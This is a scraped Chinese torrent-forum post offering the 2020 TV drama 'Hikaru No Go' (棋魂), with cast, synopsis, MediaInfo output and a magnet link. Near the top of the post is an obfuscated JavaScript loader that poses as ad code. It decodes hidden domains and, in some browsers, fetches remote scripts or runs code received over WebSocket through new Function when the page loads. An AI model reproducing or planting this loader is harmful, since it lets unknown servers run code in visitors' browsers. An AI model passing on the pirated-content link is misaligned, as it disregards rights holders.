棋魂.Hikaru.No.Go[全36集][国语内封简繁多国软字幕.无水印][WEB-DL-MKV][1080P][迅雷下载]

版主小s 2月前 292

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x46\x6a\x59\x48\x73\x4f\x52\x52\x45\x59']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxza2pmLm5pYYW5nYYW94aWFuc2hlbmcuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};


◎译  名 Hikaru No Go

◎片  名 棋魂

◎年  代 2020

◎产  地 中国大陆

◎类  别 剧情 / 奇幻 / 运动

◎语  言 汉语普通话

◎上映日期 2020-10-27(中国大陆)

◎IMDb评分 8.6/10 from 102 users

◎IMDb链接 https://www.imdb.com/title/tt13364846

◎豆瓣评分 8.7/10 from 227825 users

◎豆瓣链接 https://movie.douban.com/subject/27068009

◎集  数 36

◎片  长 46分钟

◎导  演 刘畅 Chang Liu

◎编  剧 卓越泡沫 Paomo Zhuoyue / 陆洋 Yang Lu / 徐一天 Yitian Xu / 陈晓 Xiao Chen / 楠迪夫 Difu Nan / 堀田由美 Yumi Hotta

◎主  演 胡先煦 Xianxu Hu

       张超 Juck Zhang

       郝富申 Fushen Hao

       赵浩闳 Haohong Zhao

       韩沐伯 Mubo Han

       翟冠华 Guanhua Zhai

       孙灿 Can Sun

       吴芊盈 Qianying Wu

       纪李 Li Ji

       邵如一 Ruyi Shao

       陈宁 Ning Chen

       蒋宜儒 Yiru Jiang

       江柏萱 Baixuan Jiang

       赵虎 Hu Zhao

       陈玺旭 Xixu Chen

       方文强 Wenqiang Fang

       高文峰 Wending Gao

       王伊澜 Yilan Wang

       矫昊 Hao Jiao

       付伟伦 Weilun Fu

       张珂源 Keyuan Zhang

       余沛杉 Peishan Yu

       郭枫 Feng Guo

       王超 Wang Chao

       李威 Wei Li

       宁晓志 Xiaozhi Ning

       啜二勇 Eryong Chuai

       卢思宇 Siyu Lu

       方东海 DongHai Fang

       王唏 Xi Wang

       张傲然 Aoran Zhang

       戚九洲 Jiuzhou Qi

       姜震昊 Zhenhao Jiang

       卢待熹 Daixi Lu

       刘畅 Chang Liu

       刘牧梅 Mumei Liu

       谢宇扬 Yuyang Xie

       刘亚锟 Yakun Liu

       熊向荣 Xiangrong Xiong

       老A Law Ah

       张凯源 Kaiyuan Zhang

       叶政潼 Zhengtong Ye

       李斌 Bin Li

       郑晓婉 Xiaowan Zheng

       王梁 Liang Wang

       徐艺方 Yifang Xu

       陈怡馨 Yixin Chen

       丁洁 Jie Ding

       陈诺 Nuo Chen


◎标  签 良心剧 | 棋魂 | 热血 | 青春 | 漫改 | 成长 | 国产剧 | 漫画小说真人版


◎简  介


  该网剧讲述了时光(胡先煦 饰)在机缘巧合之下发现一个古老的棋盘,从而认识了盘踞在棋盘内、历经千年的南梁围棋第一人——褚嬴,并在他的熏陶下逐渐对围棋产生兴趣,并励志成为职业围棋手的故事。


◎获奖情况


  第7届豆瓣电影年度榜单  (2020)

  评分最高的华语电视剧集(提名)



General

Unique ID                      : 74915192797933470456032992318174699413 (0x385C242CE2DAC67AE4769A579DFE9F95)

Complete name                  : G:\Hikaru No Go (2020) - 28 [WEB 1080p HEVC AAC] [95ABF5C4].mkv

Format                         : Matroska

Format version                 : Version 4

File size                      : 335 MiB

Duration                       : 41 min 24 s

Overall bit rate               : 1 130 kb/s

Encoded date                   : UTC 2020-12-28 05:24:08

Writing application            : mkvmerge v51.0.0 ('I Wish') 64-bit

Writing library                : libebml v1.4.0 + libmatroska v1.6.2


Video

ID                             : 1

Format                         : HEVC

Format/Info                    : High Efficiency Video Coding

Format profile                 : [email protected]@Main

Codec ID                       : V_MPEGH/ISO/HEVC

Duration                       : 41 min 24 s

Bit rate                       : 1 002 kb/s

Width                          : 1 920 pixels

Height                         : 800 pixels

Display aspect ratio           : 2.40:1

Frame rate mode                : Constant

Frame rate                     : 25.000 FPS

Color space                    : YUV

Chroma subsampling             : 4:2:0

Bit depth                      : 8 bits

Bits/(Pixel*Frame)             : 0.026

Stream size                    : 297 MiB (89%)

Language                       : Chinese

Default                        : Yes

Forced                         : No


Audio

ID                             : 2

Format                         : AAC LC

Format/Info                    : Advanced Audio Codec Low Complexity

Codec ID                       : A_AAC-2

Duration                       : 41 min 24 s

Bit rate                       : 125 kb/s

Channel(s)                     : 2 channels

Channel layout                 : L R

Sampling rate                  : 44.1 kHz

Frame rate                     : 43.066 FPS (1024 SPF)

Compression mode               : Lossy

Stream size                    : 36.9 MiB (11%)

Language                       : Chinese

Default                        : Yes

Forced                         : No


Text #1

ID                             : 3

Format                         : UTF-8

Codec ID                       : S_TEXT/UTF8

Codec ID/Info                  : UTF-8 Plain Text

Duration                       : 37 min 28 s

Bit rate                       : 76 b/s

Count of elements              : 752

Stream size                    : 20.9 KiB (0%)

Language                       : English

Default                        : Yes

Forced                         : No


Text #2

ID                             : 4

Format                         : UTF-8

Codec ID                       : S_TEXT/UTF8

Codec ID/Info                  : UTF-8 Plain Text

Duration                       : 37 min 28 s

Bit rate                       : 95 b/s

Count of elements              : 822

Stream size                    : 26.1 KiB (0%)

Language                       : Indonesian

Default                        : No

Forced                         : No


Text #3

ID                             : 5

Format                         : UTF-8

Codec ID                       : S_TEXT/UTF8

Codec ID/Info                  : UTF-8 Plain Text

Duration                       : 37 min 28 s

Bit rate                       : 79 b/s

Count of elements              : 762

Stream size                    : 21.8 KiB (0%)

Language                       : Malay

Default                        : No

Forced                         : No


Text #4

ID                             : 6

Format                         : UTF-8

Codec ID                       : S_TEXT/UTF8

Codec ID/Info                  : UTF-8 Plain Text

Duration                       : 37 min 23 s

Bit rate                       : 71 b/s

Count of elements              : 817

Stream size                    : 19.7 KiB (0%)

Language                       : Spanish

Default                        : No

Forced                         : No


Text #5

ID                             : 7

Format                         : UTF-8

Codec ID                       : S_TEXT/UTF8

Codec ID/Info                  : UTF-8 Plain Text

Duration                       : 37 min 28 s

Bit rate                       : 205 b/s

Count of elements              : 760

Stream size                    : 56.3 KiB (0%)

Language                       : Thai

Default                        : No

Forced                         : No


Text #6

ID                             : 8

Format                         : UTF-8

Codec ID                       : S_TEXT/UTF8

Codec ID/Info                  : UTF-8 Plain Text

Duration                       : 37 min 28 s

Bit rate                       : 107 b/s

Count of elements              : 834

Stream size                    : 29.4 KiB (0%)

Language                       : Vietnamese

Default                        : No

Forced                         : No


Text #7

ID                             : 9

Format                         : UTF-8

Codec ID                       : S_TEXT/UTF8

Codec ID/Info                  : UTF-8 Plain Text

Duration                       : 37 min 28 s

Bit rate                       : 72 b/s

Count of elements              : 829

Stream size                    : 19.8 KiB (0%)

Language                       : Korean

Default                        : No

Forced                         : No


Text #8

ID                             : 10

Format                         : UTF-8

Codec ID                       : S_TEXT/UTF8

Codec ID/Info                  : UTF-8 Plain Text

Duration                       : 37 min 23 s

Bit rate                       : 93 b/s

Count of elements              : 817

Stream size                    : 25.7 KiB (0%)

Language                       : Arabic

Default                        : No

Forced                         : No


Text #9

ID                             : 11

Format                         : UTF-8

Codec ID                       : S_TEXT/UTF8

Codec ID/Info                  : UTF-8 Plain Text

Duration                       : 37 min 23 s

Bit rate                       : 58 b/s

Count of elements              : 817

Stream size                    : 16.1 KiB (0%)

Title                          : Traditional

Language                       : Chinese

Default                        : No

Forced                         : No


Text #10

ID                             : 12

Format                         : UTF-8

Codec ID                       : S_TEXT/UTF8

Codec ID/Info                  : UTF-8 Plain Text

Duration                       : 37 min 23 s

Bit rate                       : 58 b/s

Count of elements              : 817

Stream size                    : 16.1 KiB (0%)

Title                          : Simplified

Language                       : Chinese

Default                        : No

Forced                         : No

解压请使用官方原版WinRAR,使用破解版或者好压等软件可能会出错!!!


TAGS 奇幻 剧情 运动

磁力链:
  • magnet:?xt=urn:btih:B1788753F3E03050B532E1CC870D791B45C1F79C
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回